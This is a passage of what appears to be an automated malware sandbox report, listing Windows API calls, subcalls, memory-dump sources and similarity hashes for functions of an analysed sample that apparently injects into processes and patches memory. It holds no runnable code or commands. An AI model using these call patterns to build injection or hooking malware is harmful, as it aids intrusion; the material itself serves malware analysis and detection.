    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: RtlAllocateHeaplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 3373643552-0
  • Opcode ID: 475b22c542f700798171592f4f35c0392c344f2fb33802a196dbca7db7e117d6
  • Instruction ID: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
  • Opcode Fuzzy Hash: 1BE07250414E8482E237900A00A377FA7C1FE93A9580CAA22FE0B0010F2B432683A23E
  • Instruction Fuzzy Hash: 75b751bc02450835029bf2faed24a7832cb123108660daa2a7d73e4007cc17e8
APIs
  • lstrlen.KERNEL32(?), ref: 001C4E66
  • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001C4E8C
  • lstrcpy.KERNEL32(00000014,?), ref: 001C4EB1
  • memcpy.NTDLL(?,?,?), ref: 001C4EBE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 99
  • API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe
  • String ID:
  • API String ID: 2090284900-0
  • Opcode ID: 441c6ffc8c0582c61b0adfac58d1d0598100825aab4a811963bd1f119fa93cd3
  • Instruction ID: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
  • Opcode Fuzzy Hash: DAD05E74608903C6E8076A72A84077A45CB7FC2284C5C0A35AB456042F8B2632CAF86D
  • Instruction Fuzzy Hash: 8e2a44761118e29be7740b66e44bb54a38affe365741b70a75b6181b4688890e
APIs
  • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
  • GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
  • WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
  • WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
